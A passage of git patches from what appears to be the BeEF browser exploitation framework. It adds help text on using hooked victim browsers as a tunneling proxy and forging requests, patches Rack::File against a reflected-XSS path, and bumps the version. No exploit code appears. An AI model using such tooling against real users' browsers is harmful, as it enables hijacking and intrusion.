zUvxO9iGR*%LPtA+{x413JQFphXZ$ydIAaUiGqzyHGu?Xg-<zIg87!1%2l%()n)(^I
sM7*TxIn(*O1e5Oimr>4hk_g5<)tcPO&k8WOD&XwV)ilsRs5`v=FQ;cG?*IS*

literal 0
HcmV?d00001

diff --git a/extensions/admin_ui/media/images/help/proxy.png b/extensions/admin_ui/media/images/help/proxy.png
new file mode 100644
index 0000000000000000000000000000000000000000..c924c5679eeb02ecafe33a2c8061815fe8071b58
GIT binary patch
literal 9597
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
VYJr=CUOt(Ekd;)Ds1yT!`ag4>s&D`R

literal 0
HcmV?d00001

diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabRider.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabRider.js
index cadd37d15..4973ae7e6 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabRider.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabRider.js
@@ -32,7 +32,7 @@ ZombieTab_Requester = function(zombie) {
 		title: 'Proxy',
 		layout: 'fit',
 		padding: '10 10 10 10',
-                html: "<p style='font:11px tahoma,arial,helvetica,sans-serif'>The Tunneling Proxy allows you to use a hooked browser as a proxy. Simply right-click a browser from the Hooked Browsers tree to the left and select \"Use as Proxy\". Each request sent through the Proxy is recorded in the History panel in the Rider tab. Click a history item to view the HTTP headers and HTML source of the HTTP response.</p>",
+                html: "<div style='font:11px tahoma,arial,helvetica,sans-serif;width:500px' ><p style='font:11px tahoma,arial,helvetica,sans-serif'>The Tunneling Proxy allows you to use a hooked browser as a proxy. Simply right-click a browser from the Hooked Browsers tree to the left and select \"Use as Proxy\".</p><p style='margin: 10 0 10 0'><img src='/ui/media/images/help/proxy.png'></p><p>The proxy runs on localhost port 6789 by default. Each request sent through the Proxy is recorded in the History panel in the Rider tab. Click a history item to view the HTTP headers and HTML source of the HTTP response.</p><p style='margin: 10 0 10 0'><img src='/ui/media/images/help/history.png'></p><p style='font:11px tahoma,arial,helvetica,sans-serif'>To manually forge an arbitrary HTTP request use the \"Forge Request\" tab from the Rider tab.</p><p style='margin: 10 0 10 0'><img src='/ui/media/images/help/forge.png'></p><p style='font:11px tahoma,arial,helvetica,sans-serif'>For more information see: <a href=\"https://github.com/beefproject/beef/wiki/Tunneling\">https://github.com/beefproject/beef/wiki/Tunneling</a></p></div>",
 		listeners: {
 			activate: function(proxy_panel) {
 				// to do: refresh list of hooked browsers

From c37f0e1719bb9eee71dabed15584bd672df7b443 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Wed, 20 Feb 2013 11:57:37 +0000
Subject: [PATCH 211/397] Patched Rack::File to don't reflect the URI path in
 the page if a file is not found. Official patch is not out yet.

---
 core/ruby.rb      |  3 +++
 core/ruby/file.rb | 44 ++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 47 insertions(+)
 create mode 100644 core/ruby/file.rb

diff --git a/core/ruby.rb b/core/ruby.rb
index 7b3b546d2..61a8a0cfc 100644
--- a/core/ruby.rb
+++ b/core/ruby.rb
@@ -7,6 +7,9 @@
 # @note Patching Ruby Security
 require 'core/ruby/security'
 
+# @note Patching Rack File class to prevent a potential XSS
+require 'core/ruby/file.rb'
+
 # @note Patching Ruby
 require 'core/ruby/module'
 require 'core/ruby/object'
diff --git a/core/ruby/file.rb b/core/ruby/file.rb
new file mode 100644
index 000000000..b40161033
--- /dev/null
+++ b/core/ruby/file.rb
@@ -0,0 +1,44 @@
+require 'time'
+require 'rack/utils'
+require 'rack/mime'
+
+module Rack
+  class File
+    def _call(env)
+      unless ALLOWED_VERBS.include? env["REQUEST_METHOD"]
+        return fail(405, "Method Not Allowed")
+      end
+
+      @path_info = Utils.unescape(env["PATH_INFO"])
+      parts = @path_info.split SEPS
+
+      parts.inject(0) do |depth, part|
+        case part
+          when '', '.'
+            depth
+          when '..'
+            return fail(404, "Not Found") if depth - 1 < 0
+            depth - 1
+          else
+            depth + 1
+        end
+      end
+
+      @path = F.join(@root, *parts)
+
+      available = begin
+        F.file?(@path) && F.readable?(@path)
+      rescue SystemCallError
+        false
+      end
+
+      if available
+        serving(env)
+      else
+        # this is the patched line. No need to reflect the URI path, potential XSS
+        # exploitable if you can bypass the Content-type: text/plain (IE MHTML and tricks like that)
+        fail(404, "File not found")
+      end
+    end
+  end
+end
\ No newline at end of file

From 1c252af1451567d43a9ee2e1363397b97bfc4122 Mon Sep 17 00:00:00 2001
From: Wade Alcorn <wade@bindshell.net>
Date: Thu, 21 Feb 2013 21:10:24 +1000
Subject: [PATCH 212/397] Updated version number to make explicit the patched
 Rack::File xss fix

---
 VERSION     | 2 +-
 config.yaml | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/VERSION b/VERSION
index 842f2e0d2..d418b2998 100644
--- a/VERSION
+++ b/VERSION
@@ -4,4 +4,4 @@
 # See the file 'doc/COPYING' for copying permission
 #
 
-0.4.4.2-alpha
+0.4.4.2.1-alpha
diff --git a/config.yaml b/config.yaml
index 75a8e02ea..aa801ecc2 100644
--- a/config.yaml
+++ b/config.yaml
@@ -6,7 +6,7 @@
 # BeEF Configuration file
 
 beef:
-    version: '0.4.4.2-alpha'
+    version: '0.4.4.2.1-alpha'
     debug: false
 
     restrictions:

From 7eec331cf9bb44468abafa3075f96411c5292622 Mon Sep 17 00:00:00 2001
From: Nbblrr <Nbblrr>
Date: Thu, 21 Feb 2013 23:14:28 +0100
Subject: [PATCH 213/397] Plugin for VLC detection #828

---
 core/main/client/browser.js                   |  38 ++++--
 core/main/handlers/browserdetails.rb          |  10 +-
 .../admin_ui/controllers/modules/modules.rb   | 109 +++++++++---------
 .../admin_ui/controllers/panel/panel.rb       |   5 +-
 .../media/javascript/ui/panel/ZombiesMgr.js   |  32 ++---
 extensions/console/lib/shellinterface.rb      |  75 ++++++------
 modules/browser/detect_vlc/command.js         |  14 +++
 modules/browser/detect_vlc/config.yaml        |  15 +++
 modules/browser/detect_vlc/module.rb          |  14 +++
 9 files changed, 196 insertions(+), 116 deletions(-)
 create mode 100644 modules/browser/detect_vlc/command.js
 create mode 100644 modules/browser/detect_vlc/config.yaml
